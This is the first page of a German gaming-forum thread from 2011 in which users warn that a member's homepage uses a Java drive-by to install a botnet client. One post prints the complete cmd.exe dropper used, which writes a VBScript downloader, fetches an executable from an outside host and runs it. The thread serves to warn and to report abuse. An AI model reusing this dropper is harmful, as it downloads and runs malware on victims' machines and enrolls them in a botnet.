Warnung vor 4C1D

Page 1 of 4

05/14/2011 19:14 Daroolein#1

Guten Abend e*pvp,
ich m�chte euch vor 4C1D warnen!
Er hat eine Homepage in seiner Away, mit einem sogenannten
"Javadriveby" was w�hrend ihr die Seite besucht, einen Virus
runterl�dt und euch seinem Botnet hinzuf�gt!
So eine �hnliche Aktion gabs vor einiger Zeit schonmal von mir,
doch ich habe erkannt, dass das schei�e war.

Die Seite f�ngt mit [Only registered and activated users can see links. Click Here To Register...] an. Passt bitte auf.

Ich poste das in diesem Bereich, da man vorallem hier Nico aka 4C1D
kennt.

Ich habe Nico auch bereits gesagt, er soll die Seite down nehmen,
sonst werde ich daf�r sorgen, dass sie down geht.

Mit freundlichen Gr��en,
Daroo

05/14/2011 19:16 Padmak#2

Das Script das ausgef�hrt wurde:

Code:

cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs  http://aaaccciiiddd.bplaced.net/server.exe %temp%\update.exe'

Achtung!

Padmak

05/14/2011 19:17 CranK�#3

Wer ihn in skype hat geht auf keinen fall auf den link in seinem profil!!!!!1

05/14/2011 19:18 Padmak#4

Achja, die Seite ist auch schon als Abuse gemeldet bei bplaced
Sollte also bald off sein

Padmak

05/14/2011 19:20 KinGDexo33♥#5

Good Job!

05/14/2011 19:21 anil the alpacino#6

Hmm war schon drauf.. Dann kam etwas von aktivieren or so.. dann hab ich die Seite wieder geschlossen :S

05/14/2011 19:22 KinGDexo33♥#7

Quote:

Originally Posted by anil the alpacino

Hmm war schon drauf.. Dann kam etwas von aktivieren or so.. dann hab ich die Seite wieder geschlossen :S

Jetzt bist du Infiziert mit dem Virus :mad:

05/14/2011 19:23 wegus#8

Dank Daroo, habe ich auch erkannt dass es schei�e war ;)

PS: Padmak & Crank sind doof :p aber Padmak mehr, da er denkt das die Seite offline gehen w�rde.

4C1D

05/14/2011 19:23 Padmak#9

Jein, ich denke mal er nimmt das BN runter
Lass einfach Virenscanner durchlaufen, sein Virus wird auch erkannt von allen Scannern

€: WAS? ICH?
Ich hab EXTRA view-source: davorgehabt!
Reinkopieren, NICHT draufdr�cken :>
Musst schon genau lesen

Padmak

05/14/2011 19:26 .Scy#10

wer vor 4C1D angst hat, der hat keine ahnung von pcs. alles wirklich alles was von ihm kommt in richtung virus usw. ist mit maleware bytes bzw. avira antivir runter zu bekommen da der scheiss den er sich dort zurecht bastelt aus tuts besteht und nicht aus eigen wissen.
aber trotzdem thx^^

05/14/2011 19:26 KinGDexo33♥#11

Toll Padmak ich habe jetzt auf die Seite geklickt .. Was jetzt ? :P

€: dann bin ich wohl auch ein Infizierter :ooo

:drama . Stufe10:

05/14/2011 19:27 .2good4you111#12

Mal was ganz neues... xD

05/14/2011 19:27 CranK�#13

Quote:

Originally Posted by wegus

Dank Daroo, habe ich auch erkannt dass es schei�e war ;)

PS: Padmak & Crank sind doof :p aber Padmak mehr da er denkt die Seite w�rde offline gehen.

Und warum bin ich doof? :'(

05/14/2011 19:28 .Scy#14

4C1D du bist nen lowi :D
dein botnetz wird immer kleiner weil immer mehr leute das programm l�schen :D

05/14/2011 19:29 KinGDexo33♥#15

Quote:

Originally Posted by CranK�

Und warum bin ich doof? :'(

Es liegt nich an dir es liegt an uns ..

(trozdem bist du bissl Doof :D

Page 1 of 4

Last »